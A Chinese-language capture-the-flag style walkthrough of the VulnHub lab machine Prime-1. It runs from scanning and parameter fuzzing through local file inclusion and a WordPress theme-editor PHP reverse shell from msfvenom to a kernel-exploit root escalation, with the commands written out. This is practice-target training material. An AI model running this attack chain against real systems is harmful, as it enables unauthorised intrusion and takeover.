vulnhub渗透测试靶机prime-1

靶机下载地址https://www.vulnhub.com/entry/prime-1,358/

nmap -sS -sV -p- -T5

发现只开了22和80那就从80入手吧
浏览器访问 主页除了一张图片啥都没有

dirb扫描目录发现了/wordpress目录和一些其他的页面

其中的image.php,secret.txt都不是默认字典有的，问了几个师傅，说做多了就有经验了，关键字典要自己扩充）

wpscan只发现了一个用户victor

image.php和主页一样只有一张图
看看dev和secret.txt
dev

secret.txt

提示让我用fuzz模糊测试在某个页面中找到某参数=location.txt

使用wfuzz在index.php找到了file参数
进入http://192.168.49.18/index.php?file=location.txt得到进一步提示

提示让我们在其他的页面上使用secrettier360参数

继续fuzz
在image.php页面发现了dev

进去看

发现这里直接包含了dev，是一个文件包含
我们包含/etc/passwd

包含这个路径，得到密码

加上前面用wpscan扫描出来的用户victor
victor:follow_the_ippsec登录wp后台

进入后台后直奔Theme Editor

然后在右边的文件列表里找一个可以编辑的php

在msf里生成一个shell
msfvenom-p php/meterpreter_reverse_tcp LHOST=192.168.49.129 LPORT=4444 -oshell.php
然后在当前目录下cat shell.php
把它复制下来 贴进wp后台保存
上传成功后
进入msf 设置接收ip和端口

进入监听
然后去打开wp的那个shell.php
其默认路径为
http://192.168.49.18/wordpress/wp-content/themes/twentynineteen/secret.php
然后kali这边已经收到了shell

（前后两次开机ip变了，这里的192.168.49.158就是靶机）
进入提权阶段
shell
python -c “import pty;pty.spawn(’/bin/bash’);”
先查看当前系统的版本
uname –a
查看

直接msf搜索有无可利用的提权代码
searchsploit 16.04 Ubuntu
发现有可以利用的代码

出去复制出来
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc编译
gcc 45010.c –o root
然后用meterpreter上传
上传的文件夹一定要有写权限 这里选择了/tmp

进入shell交互界面
给上执行权限
chmod +x root
然后./root执行 成功拿到root权限

虽然作者把这个靶机标为OSCP like machines，但是总的来说这个靶机还是比较常规的，除了secret.txt和image.php要在自己的字典里。用dirb做信息收集，用WFUZZ做模糊性测试，看见WordPress站，就想到用wpscan扫一下，在这个靶机中才能拿到用户名。web考察不是很多，只用到一个本地文件包含。进到wordpress后台，修改模板写一个shell，都是常规思路，内核漏洞提权也是常规提权手段。
欢迎各位师傅指点。